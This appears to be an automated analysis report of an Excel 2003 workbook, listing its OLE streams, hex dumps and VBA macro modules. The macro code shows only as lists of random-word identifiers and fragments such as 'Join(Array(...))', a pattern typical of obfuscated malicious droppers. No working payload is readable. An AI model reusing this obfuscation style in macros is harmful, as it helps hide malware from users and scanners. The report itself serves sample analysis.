Data ASCII: . . . . . . . . . . . . . . . . P C . i . . . . 5 . . . H . 8 . . . . . . . . . . O 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . uz . x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 03 00 00 d4 00 00 50 43 e7 69 a5 aa 81 ad 35 de 97 ca 48 8f 38 d5 00 00 00 00 00 01 00 00 00 4f 34 8c fa 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

shambly

philibeg

agonises

VBA File Name: intitulesalertheterosporiesamp.bas, Stream Size: 155385

VBA Code Keywords


percheronscamphirestabouringge

carvacrolbeathedlevities

obstruction

'badmouths

medevacs

habiliments

'realtersalchemizes

rampart

qawwaliscoaxer

totient

condemno

enamelists

skeleton

beadsmen

abhenry

gravlaxesoverplans

newfangledlytillingsuntranquil

besmear

salamandroids

physios

unwhitebaccy

'governmentalist

antidepressantcopals

exomionsovergiving

placental

acoustically

walks

kernmantel

under

zarnichs

scarmoges

'stupasmicrometeoroids

phormingesstolidestbaetylstegm,

adoptin

remint

superinfected

cenotaphicfilariidabridgment

'individually

arointaggrosdreidels

'dishabiting

hydranths

preadult

disinfestant

porterhouses

yaffing

betters

seemsbollocksingencapsule

'acari

hoteldoms

digitalizingdepauperisesswardi

'inaccurate

bursicons

progression

parenthetic

accessorises

jarringly

unblurred

grunions

monohulls

'keycorconstitutionalizeblephar

neglectfully

tetragonalnesstimbermenyoop

'piggedoblatesbroughpreclassica

enjambemen

Keyword


tearfulscuppernongsresinisedea

paddymelons

cringle

incondite

'automobilistsclausalovercoolin

heliocentric

'twirpvirtue

fairingssummarinesspretravel

emeticarmourerexpeditershydroe

scurril

folkies

infringed

quilt

'extralegalgourastwanglingegoce

spoilageblockersvirtuosos

unplace

palpi

randomizeschorizontistsaudacio

strabismicchainsneeshingdialog

convertiblyelectrofishings

'coshererscrucifier

'semisyntheticpanderousadoringl

internist

'pyknosesvesuvianpenniform

phonec

onagers

dassie

swingsvulgarizeupbroken

'mensural

hopscotch

turnbacksmicrofossilshoneytrap

'efficaciously

tirelessly

'vibracularium

poulard

kirbigrips

locusting

hawkweed

queerdoms

warmongering

'grasperstrochisksralliform

bentier

updateablefippencetripy

nubia

sonorously

moderatrix

succumbers

pavanweigherquoddedoverassessm

overnew

afterswarmsubcurativesdikierac

festive

overpoised

'ordinantstrifoliategomphosisnu

pennywise

cockatielsai

tanrecs

punch

blithesomely

handprints

'figmentboardroomeiderdown

thromboses

waring

'skiddoosmetaversehydrochore

unconceala

Keyword


fairyisms

licenced

geneticists

boppermenudocarbazole

'equal

nationaliseeisell

embitterments

tranquillizer

counterreactions

cyanamides

affears

pooling

mannerist

beryline

mudlogger

phlegmasias

signalising

unthinkabilitiessubordinatecyc

'bookiebattlepiecesmoguledcling

ordoplaudite

sciomanciesdissimilarlycogshan

roasts

semitone

overfavors

'indirectionbuoyage

cytasesphysicist

throughlycompounds

proslambanomenephenylthioureas

pownie

unbindsexoplanet

inmigrants

elateriums

quagmiringunhandicappedphilant

ginzoesquestingundepreciated

precessiona

currentn

popsocks

heeler

broadcasters

alkylatingsighter

taphono

frangi

beadworksjejunelydiscos

overclassificationspiddlingly

upmaker

overclubbed

kirbigripmaubies

inculpableness

leaki

doorknock

'marmelise

subprofessionals

unveilunchoke

abators

nonnovels

veenaashetunderutilization

parkin

'whitherwardmanpowersnuggestmen

pouping

disinclosed

inoculanthutzpas

broacher

vacantness

geggie

Keyword


VBA Code

wefted

'rhabdomyosarcomata

'eringoescinematographypullup

'sellmortadellas

nonnormal

canalise

parade

'swingle

correspondingly

'senegasfibromyalgia

preconsciou

'guberniya

loons

'aspiratae

personatings

'euphemizedmissishnessthroughwa

flora

soliquidsstuccoesrubefiesfeyes

palmerwor

divorcee

adherentlyjudiciouslyhalachics

azoic

exceptiona

whimple

'inseamshackliestinvolucrum

'trapballswail

remanufacture

muntjaksreconditioning

muskitssiamezingrestringbumpki

ostracizes

pipefittings

glowfliesshrewdnessanlas

wearisomeness

abundancy

absits

emulgen

marathonings

goestsustainings

galling

waqfs

flunking

scotomiasgovernablenessprescri

purgative

encolpium

tinchel

philateliccommissionedgarrotte

'tralatitious

tokomaks

defec

punctations

dehortativeevidentiallyambient

'muggedauspicate

weighable

supercargos

doiltest

pipit

'zingaroopercelesbeachcomber

intangibly

subdistricts

'marginalistsmemorycocineras

zinge

Keyword


VBA Code

General

Stream Path: _VBA_PROJECT_CUR/VBA/nucleidesdisgestedmercerisesdu

VBA File Name: nucleidesdisgestedmercerisesdu.bas

Stream Size: 7272

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . O 4 L ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z .x W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 30 03 00 00 b8 11 00 00 00 00 00 00 01 00 00 00 4f 34 4c 7e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

anamor

fortuitouslyminutedprinked

reagencyoutpourstirled

mentations

inclementness

kwela

quercetic

monads

'jewellinghalfpenny

laconicalvaleratesreduces

'reddling

helistop

aneurysmal

suffer

feedstock

hatteringirefulnessesmuttonfis

diaristic

remounted

lalland

'trompeddefusermalleable

interpretershipschlockmeisterb

replantingdartingly

libra

masterlyworrimentallowance

nonanthropologist

candygrams

'stanzoheterogeny

skippiersolatiumdiel

resojets

nasalisationscointreauphaeisml

pindling

cloop

fother

sockdologer

depolarizers

plumbum

knapping

scrutinously

sicking

thawer

cryoscopicgypseousvildly

hexamine

tophes

nicotianassindingscompellerswo

sorgorabbiniteremnant

VBA File Name: nucleidesdisgestedmercerisesdu.bas, Stream Size: 7272

VBA Code Keywords


foyboatintenerationscomposture

'transposablebronchospasmsprout

toged

hypercon

nettling

counterclaimedattractantsblasp.cyanotypesgreedless(hypalgesiahomosexualismstheodo),

psalmbook

'hookednesses

stratocrat

enrapture

giglets

rusas

cable

taroks

insnarement

'brollygaliot

miscegine

chansonette

macrocopy

mazhbisgipsyinganalogouslyswag

reacquiring

aboideaus

osculaevilnessesseined

customarinesses

'biodegradations

balklines

hartebeests

'restrengthensearnersnonrecogni

intimaters

oxygenases

nonroutinesgrandioselyjapanize

domesticsclerenchymalantana

mulloway

slipsheetsazzes

echograms

deutoplasmseemlihedtargeted

'prothalamion

feminines

casingtawingpopulars

radicands

wilily

sportswears

august

'refrigeration

substructing

callipygian

rerolling

louser

'imitating

basestintercampusapocryphonsoc

markhors

porphyrogenites

hypergamous

bronzen

'nourishednanoplanktonparamedic

brominatedridgetreeloudliest

sonobuoys

xenograft

violence

simillimum

rollmops

tensons

decompressing

mistimingendolymphsconstatehar

Keyword


ultracentrifuging

hexametersorganist

sestett

lustrel

alfaquins

unventilated

cyclog

divesture

aestheti

morphemically

theoreticsrenunciatoryaulnages

sciaticascheloneshomeland

'resplendentlymisconjecturesbig

misvalue

tastingsunpliantcerebella

'cybercast

'prosodical

'civie

parhy

restorationists

insoles

kettles

'crochetingsencolpium

lysols

'assais

pettifogged

cervelases

unlearnable

"nucleidesdisgestedmercerisesdu"

purtraid

retagging

motoricallylutenistshillbillyo

bygones

delivers

annulates

'perlustratesenorswimmingshared

capillaceous

paralleled

falxdolium

hylicismbioethicmedicinedrefec

transpierces

Attribute

siffleurs

serigraphy

placed

deserpidinesforgoneextremistir

untwilled

dyscratic

cosmos

staginesses

'beignet

druidry

scleritises

galuts

wriggled

undenie

VB_Name

'frontiersmentetrodotoxin

'homophobias

pandurastruepenniesparalogists

eutaxias

marinaraavoidersproteasupernat

incre

'kahuna

Keyword


VBA Code

hypodermic

pedagog

chartas

Function

homolograph

spiflicate

declared

pneumodynamics

calendulas

loaving

succubae

'conglobingtwiddlemagging

'coolies

demesne

pignorat

dismalitiesrouthutopianismshel(rivalisedpreimposingslattingsc)

conducive

sluggardise

placabilities

subvened

'leptospiral

hogen

zephyrdemonstrativenesses

mulct

crumen

pisolite

cosmeticizing

nonpaiddonnardredistributes

quarterlife

biftahsdisemboguingfanum

bletheri

'placentologyparasiticidal

lamppostcrayrethread

graplements

rivalisedpreimposingslattingsc

feeblemindedness

enarm

barilla

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/schlubupleaningfarmhouse

VBA File Name: schlubupleaningfarmhouse.bas

Stream Size: 12837

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . 4 . . . . . . ' . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 82 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff b0 03 00 00 70 1e 00 ce 13 2e 34 fd fa 92 e1 a9 11 27 a3 4a c2 b4 8d ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

'bream

intravasationssubtreasuriesreg

zoist

obnubilatedpeytral

faitour

VBA File Name: schlubupleaningfarmhouse.bas, Stream Size: 12837

VBA Code Keywords


sufferer

robed

invulnerabilitieshippocampipyr

clairschach

unpleasurablerectricialimbathe

oxyphenbutazones

irresolutionlimelightedcrazywe

'soaplandssanitizations

roneoing

adjurorsladanums

hypermnesic

convokefantasists

rescaleminutemenbivvied

'apostasies

kything

unheard

enantiomorphismswoadwaxcorkage

ossivorous

affectedsparkliest

lemans

xenophoby

reutilising

yantraspock

adduction

fantasticalitiesoutwhirlingdog

antalgics

airfields

tracheobr

pyknics

legend

urgersparaboloidsquarterfinal

menstruated

spheroidises

unforested

pawnshops

saltationismundernourishesexpe

bradawl

stinginesses

dispermous

lordomas

falderaling

upleads

archbishopric

sacroiliitises

'repressiveness

contemplativenessesvoyeuristic

wheyfaced

ashier

'indelibleness

videodiscs

reconciliatory

suburbanizes

dickers

'zoeticsubappearancesalcoholizi

cohortative

lowlifes

obelizes

freshes

'cyclogenesesgapless

incudate

kishkes

gangbusterssulfinpyrazonessire

subspeciality

huicbucolic

Keyword


periscopes

'unusualnessesnonemploymentspre

circuitries

pilgrimising

guttating

'nonincreasingsitiologiescrapeh

'dominating

philosophi

'disconfirmationintramuralovern

egenceslinguisticiansencounter

'cogence

checkerboard

antirecessionary

romanisationsrefitting

langlaufers

unsettledness

bespedscrawnilycomparability

'inconsequentialitydonenesseste

grampa

drillingspinnerulestuddingsail

coenaesthesesunamusablepopular

'nominalizinginoperabilitiespun

synonymicalretimed

stoneshots

Join(Array(rickingopercule))

valleculaeupholding

tjantings

coercivities

accessoriuszestfullysearchingl

jingoists

lionisationswangles

cheateries

ruefully

scaphoid

baymen

guffawedinformatorygalactosemi

achier

spado

creophagy

taekwon

carsharings

abidunsluicestarsiasforesays

circumduceremorsefulnessesveni(dotsketchupsgnosticism)

bushingovertalks

'carminativessnebbe

daguerreotype

ibrik

intermembrane

parabioses

carefreenesses

'trapnests

evets

congreeting

foible

notary

unlatches

'profitable

sphairistikefruitfulnessmegahe

prodigal

cartwhee

'pikeperches

chevisance

quirkiness

posingly

Keyword


poundrenestsribibesmanifolding

lenifying

'infamizetauhouspackthreadsvega

lulled

glissaders

netful

revive

becquerel

resurrecti

isophotes

piscivores

fizzed

mislabelled

gowled

hyraxes

'behavingdoumshierographersallo

bewailer

halfness

stubby

standfastsdiagraphicglobetrott

'steels

sonnetiseallegorisermesophiles

interdistrict

rickingopercule

cezve

civics

'ladyhoodsijtihad

impudencymaltase

unsurmountable

chigger

'solidungulate

preassure

semipolitical

graupel

medical

opisthotonic

succor

connectively

aviationsensationaledgebones

mussitation

dought

augurs

sheik

vulgarises

apollosneuropath

dejectoryhoordnondialyzable

structuralizing

'antineutronsferriagestrendzygo

cuboid

shends

outdriving

rejoiced

intervisitationsreformattedpos

'curtestaduststrompes

floatation

geote

'atmolyzes

'proceed

overexpansions

hexavalent

macrophageneutralisationslacta

moond

caveating

'vasoinhibitorsoverbeaten

Keyword


VBA Code

epidermolyse

plumpened

chairborne

etherifies

meningococci

rachillasunblooded

lifelikeness

catalexes

syndactylous

circumduceremorsefulnessesveni

alphametics

'eggy

lippierduodecillionsmetacognit

'teleselling

undulancescardiomyopathiesinco

overstaff

predestin

spang

bullbriermesenchymal

unsteadylongbowman

beshivers

hooplike

oppugnant

recontoured

'gemologistshopefullystrifeful

librettist

'perambulatoryintrogressants

carsicknesseszarebas

gemmological

'unprecedented

quassinspreinserting

VB_Name

symposiacsjacquardsgayeties

blunderers

sarabandsreorchestrated

exsanguinatesdepilatorycandida

multiton

bulbuls

stevenoversimply

dulia

acropetally

onloading

earbudquonkedsemistiff

spoliative

celom

ventri

'revascularizations

moveablenessesephebustroublesh

wifehoods

outrebo

attrapitinerationforcipaterepr

bedpansprescorepandiculationso

decoy

epoch

titanisms

blasphem

'filoselle

hoveredamphisbaenaemehndi

propodeum

Keyword

VBA File Name: surveyalscosmotheticalmarcesce.bas, Stream Size: 19978


General

Stream Path: _VBA_PROJECT_CUR/VBA/surveyalscosmotheticalmarcesce

VBA File Name: surveyalscosmotheticalmarcesce.bas

Stream Size: 19978

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O 4 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 82 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff b0 04 00 00 b8 2e 00 00 00 00 00 00 01 00 00 00 4f 34 43 82 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

racecourses

'distingueeblacknessescineole

CLng((Not

tombs

accoutre

'chairwoman

marbleizing

pardonerchapteraldisseatswherr(foresightedlyoverburtheningavo)

prisonment

repressurising

pyrocatecholeyebrightsnipterox

whipsaw

'methodologist

quantical

enzoningstrengthenerkerosinelu

'domicil

unrideable

screwdriver

seignory

subemployments

airing

peloriaspangrammatistunclosefe

'tuskiest

mobbles

recit

chamaeleon

upstirlordlingfurbearermyelocy

ethoses

gaieties

underminde

bantamrespirationcavitiesingra

antilifershoghtransportational

gyving

acronicallyregroups

'hackamore

noxal

bogginess

'hyper

catatonia

pinaceou

macrofossils

stood

caseworms

extralegalintuitivelyinvarianc

'transcendedprothonotaries

'millicuries

triggerman

terpinol

chitteredswindledgeekinessabsi

mainstreamings

VBA Code Keywords


fiducial

apocopate

queenlier

'wackethinnish

unperishabletowy

interavailabilities

bluntes

boughlessdotcomstanchingsstang

coelostat

exemplified

wilfulnessskulks

metre

tooting

deers

coelostatstranquilisebedumbed

antemor

arsonists

'stickup

marcelled

extinctions

indeciduate

containerisations

casketethnohistoriesregelates

zoonotic

acupunctures

casevacs

cardialgic

restimulatespavanegroned

inconformitiesutricles

overpedalled

levigatingtidytips

jockteleg

phorate

engender

spoliating

mirex

hadromeunpossessing

undyin

circumfu

sculduddry

'whuppingsresistors

euphausiaceans

matchmakeknubblier

misstepped

osteosarcoma

parosmias

mandomdrongoesgreenshank

'intrapreneurialdecerebrisesimm

innerving

vortexesgumboilseuphon

'picturizationswoodlotsmicrofil

shelfroom

fatwah

churls

metayage

colourantexpended

counteradvertising

warmings

cliquie

psyches

permean

'colourisationmicromanagergalac

pinschers

kantelas

Keyword


sparkled

'blooie

'stewartryenjoinappropriationov

nailbrushes

epigonusphacolithsguiders

shippie

'scrowling

'hazers

sandpumps

signifiesperfectionists

basters

unslingfundraisingsdreary

bastardly

tubificidsbescrawling

'chaserputteneconometricsyllogi

lozens

subdialects

calandriascharlatanicalbotulis

sigmoid

infec

distinguishment

mistrusts

backclothgogglesgrimierstronti

representationalismspreclearan

taxonomists

misspelled

homiletical

goodish

uglifierflyableneckweed

comous

bardolater

endeavorer

divebombe

unacceptability

sneeziestretainerships

gadges

liturgistpretendershipssheetie

sacrosanctities

tsardom

mollycoddlertopsoilingsoptimis

bizarrelymidcultshrinkingrhyne

phaticallyretyingcalibrates

oarweed

'campanologists

tichy

francises

vesuvianflavorfully

affiant

tactless

healeepilferies

Join(Array(educableskyphoi))

'papillotesmordaciouslyfireboat

handymenforejudgements

mesoblastsaffectationaccommoda

medalplay

triblets

'bearsnuggertroped

essoin

homomorphosisoukssilkolines

neatening

adhere

increase

slumbe

triclads

Keyword


goosefleshbackloggeddilettante

caloricanimadversionsbruncherp

pantaleonbayous

gooliesspitstickerspermatogeni

tylectom

theorisation

locatorsintertrialprankiest

photobiologist

advening

gironnyisometrymixtions

mercilessnessesconfessionaryri

'leresinfibulateoverspeculation

unlivesmonosyllabicpiculetbasi

'spinule

covelets

'tarantism

insentiencesinterventioniststi

'puddly

belars

stripling

operablyfixturelessintrudingge

torsktabourinsstilettoesoutrea

remoralize

duplicitousineffectuallycuatro

madbra

brakemen

bellowgraywateraugmentsnonrumi

gladlier

xanthine

parasitolog

unshirtedfrostnips

missionisers

nonmetals

'niacinamiderepugnances

'overzealhomoeomorphy

illogicalnesses

convena

hoarselyhummockytelescoped

refilmed

lickspittl

'unpracticalness

impatiences

umpteendiazotizinggabledhindwi

lieves

'dietitians

putrescibilitysocketingredcurr

'jailhouses

somerset

yOcJl%.JR",

tongers

gerundsgroundbaitnursledresple

Join(Array(triskelionsyncretisticaccusato))

encryptioncramoisycollaret

tablespoonfuls

unbroken

gratinee

unmaskingssalinesecoclimate

reproachingly

elegizedcoinfersleakinesses

VB_Name

hippogriff

haddocks

wristwatches

compul

Keyword


VBA Code

cramboclink

sightedconsuetudes

hemiacetal

philhorses

tattler

perfectionistic

hurraying

dunderpa

herborised

misplacing

esloinsfrogspawnsbashfulness

polyacrylamides

bioengineeri

convokingpedicellate

Keyword

General

Stream Path: _VBA_PROJECT_CUR/VBA/zoographistsuphuddentiltsnoven

VBA File Name: zoographistsuphuddentiltsnoven.bas

Stream Size: 20066

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . / . . . . . . . . . . O 4 . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . ~ . * o B L . . . . # . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . K . . . u z . xW . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Data Raw: 01 16 03 00 03 f0 00 00 00 02 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 30 04 00 00 20 2f 00 00 00 00 00 00 01 00 00 00 4f 34 ed 2f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Keyword

saimin

solacious

bumkin

restrikinggrowlpantheologies

toadyisms

funkia

circuitry

barracoons

farads

miscoding

raiking

achoo

laureatingcryobiologistsflix

epicalyxes

kiboshing

overegg

priestintercalar

watercours

schmalzy

malaxesnonplus

shrinkerssubocularbreadwinnera

insalubr

lustring

Join(Array(quinchedanticlinoriumpigoutres))

blagueurstelethonwarted

'sulfuratenoncredentialed

overoptimisticallyuninterested

juxtaposition

fivers

VBA File Name: zoographistsuphuddentiltsnoven.bas, Stream Size: 20066

VBA Code Keywords


pantalooneuphenics

poorwills

mujahidin

conglomeration

'shipperrespectsnuggerestrepeme

chelipeds

'minifications

'prefecturallaminar

vicegerents

corsivecircumventorwhortleberr

oesophagussocialismscharleston

'bacteriostatsvigilantnesses

obtruncating

bioturbat

'aborterscircumductory

beglad

kibitka

hallowers

monological

strodled

fixings

'fasciately

blousy

method

mithridatismlaxistslandgraviat

quartesignitersshampooerquanda

interfacial

chapmanships

mountenance

tarantist

'wrickingimmaturenessesresectop

'multirangeplaisterdecorativebe

themself

toboggins

erasing

feazed

metallics

ravels

extensors

rotativehighlighters

disapplied

'encliticlinoleumoverbrowsing

'jock

'confuseequilibrity

paramorph

matchmaking

proked

ricksha

winteredhaematologic

spurts

manni

crystallitismatronize

'rattletraprubboardsunfunnier

polylysines

starklycontrollershipmicropunc

wizautomatablefantasises

implore

ceasmimsiercismontanehall

polecat

conciliarredistrictshinderings

ingeminatetalant

slangily

shaloms

"zoographistsuphuddentiltsnoven"

Keyword


trichologists

reissues

'vigilantesdialecticianpangram

youngth

improvisatescrouchingabrin

lineable

fearsomenessfenagledsifts

jilgie

'corollacongealmentszoosporangi

cohibitive

pyreneite

'hangared

commentat

'superencipheredterracelessrake

congenetic

tormentils

ordinals

irresponsiblecrackjaws

chemoautrophs

'yawper

solives

bathythermographs

'dopedtranquilisinglybosses

collegially

gaffes

'thermosetdapperlingsopenhearte

chunkinesses

forsakenlyunselfishlypusillani

interlappinghardokes

cloverleafs

mithridatismlaxistslandgraviat(sparrerssubmarginallycoworkers)

snelled

stilettoes

zygomorphisms

'indigentscrowregisters

showerproof

concretisms

'gutcherscaffeines

bindery

capitalisedlongheadednessesgum

wimping

brazen

'unhead

'bonibells

'misdemeanour

odontophore

outgeneralingbolarshylysprues

labourisms

darkener

overreacher

dipnet

ogresseshoon

jackaroo

fictitious

lifelesspomeroys

durocs

plasterboard

glycols

unrulimentmudders

'reconsiders

'overwithholdingsubmultiples

interpones

dioramic

introspectreinette

Keyword


agnosticisms

caulking

penitentiallycartonagesstereom

perfect

pervertednessspammypreinserted

Join(Array(strodledphotobiologyvacillator))

quinchedanticlinoriumpigoutres

whombled

'longanimityminutialoverachieve

harmonics

vodcast

sleekier

slighter

cedularesplendoutnumberedseptu

firedamppreshrinks

chondrichthyan

'hypersomniamaenadicallyunpolar

sheepshearings

undermasted

lungan

orphaned

cantankerously

pycnoconidi

cheveron

jambing

hereticallyquitclaiming

rompish

anodisingnubbrodkins

semiflexibl

pouldres

piercingnessespuppyish

fourteener

burdener

cinemago

vivisections

morrhuas

disculpating

strodledphotobiologyvacillator

preexistence

recaption

undervaluing

photodissociatingelatedmilleri

concelebrant

massiest

pectization

menorrhagic

'shatwahoosbeliesbowerbird

dactylographerbotanizedsquirar

urinalyses

barrackings

written

scintilla

indestructibilities

fumaricgatemen

seamset

tsesarevichesindrenchchlamydos

'outyelling

oppigneratedmurkiness

asanas

yarked

officialties

corrosion

unassailableness

thiblesrearplebbyalgerines

Keyword


VBA Code

unisonally

modishne

beflower

'clubbier

northwestwards

hypatessclerousvibsuncased

'bandingsstuffyfoodfulzelatrice

giftwraps

estrepe

apophony

'punchbowls

impudicity

unstalkedcostatetapescriptoutt

redisbursing

night

'layeragesdemographicallyhomoge

ticklish

'sirnames

percentage

gulleys

unprofitability

haver

tatevintagerposseddeconcentrat

'cholesterinruminative

platformed

pseudoscientific

reticulating

florescententhalpies

floristryperineuriumconjuror

beton

monosyllables

northeasternsidepiecesunciform

antih

envois

unceded

Keyword

General

Stream Path: \x1CompObj

File Type: data

Stream Size: 107

Entropy: 4.18482950044

Base64 Encoded: True

Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .

Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General

Stream Path: \x5DocumentSummaryInformation

File Type: data

Stream Size: 284

Entropy: 3.25903717535

Base64 Encoded: False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 284


Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . .. x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a s s a li z e d a q u a m a r i n e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . .

Data Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 78 00 00 00 0b 00 00 00 80 00 00 00 10 00 00 00 88 00 00 00 13 00 00 00 90 00 00 00 16 00 00 00 98 00 00 00 0d 00 00 00 a0 00 00 00 0c 00 00 00 c9 00 00 00

General

General

Stream Path: \x5SummaryInformation

File Type: data

Stream Size: 320

Entropy: 4.03399889752


Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . .. . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b i f i d ly b i l o c a t i o n s . . . . . . . . m i c r o e l e c t r o n i c a l l y m e r c e r i s e s . . . . . . $ . . . m o n s t r u o s i t i e s e l e c t r o p h o r e t o g r a m s . . . . . . . . . .

Data Raw: fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 10 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 02 00 00 00 58 00 00 00 03 00 00 00 74 00 00 00 04 00 00 00 9c 00 00 00 08 00 00 00 c8 00 00 00 12 00 00 00 d8 00 00 00 0c 00 00 00 f0 00 00 00 0d 00 00 00 fc 00 00 00 13 00 00 00 08 01 00 00

General

Stream Path: Workbook

File Type: Applesoft BASIC program data, first line number 16

Stream Size: 52696

Entropy: 6.51767192282


Data ASCII: . . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . u s e r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . = . . . . . . . ` T . , 8 . . . . . .

Data Raw: 09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 75 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

General

